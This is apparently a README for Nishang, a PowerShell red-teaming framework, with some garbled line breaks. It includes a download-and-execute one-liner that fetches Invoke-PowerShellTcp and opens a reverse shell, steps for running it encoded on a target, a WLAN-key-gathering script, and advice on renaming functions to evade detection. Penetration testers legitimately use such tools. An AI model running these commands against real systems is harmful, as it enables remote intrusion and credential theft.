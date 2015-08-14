

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.

Usage:

PS C:

ishang> Import-Module .

ishang.psm1

PS C:

ishang> . C:

ishang\Gather\Get-Information.ps1

PS C:

ishang> Get-Information

PS C:

ishang> Get-Help [scriptname] -full

Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name.

PS C:

ishang> . C:

ishang\Get-WLAN-Keys.ps1

PS C:

ishang> Get-Help Get-WLAN-Keys -Full

Use the in-memory download and execute (Method 1):

powershell iex (New-Object Net.WebClient).DownloadString ('http:///Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

Use the -encodedcommand (or -e) parameter of PowerShell (Method 2):

All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell.





For above example, add a function call (without quotes) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".





Encode the scrript using Invoke-Encode from Nishang:

PS C:

ishang> .

ishang\Utility\Invoke-Encode PS C:

ishang> Invoke-Encode -DataToEncode C:

ishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand Encoded data written to .\encoded.txt

Encoded command written to .\encodedcommand.txt





From above, use the encoded script from encodedcommand.txt and run it on a target where commands could be executed (a remote shell, meterpreter native shell, a web shell etc.). Use it like below: C:\Users\target> powershell -e [encodedscript]







If the scripts still get detected changing the function and parameter names and removing the help content will help.

SCRIPTS:

Nishang currently contains the following scripts and payloads.

The scripts on a target are meant to be used in memory which is very easy to do with PowerShell.There are two basic methods to execute PowerShell scripts in memory:Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session.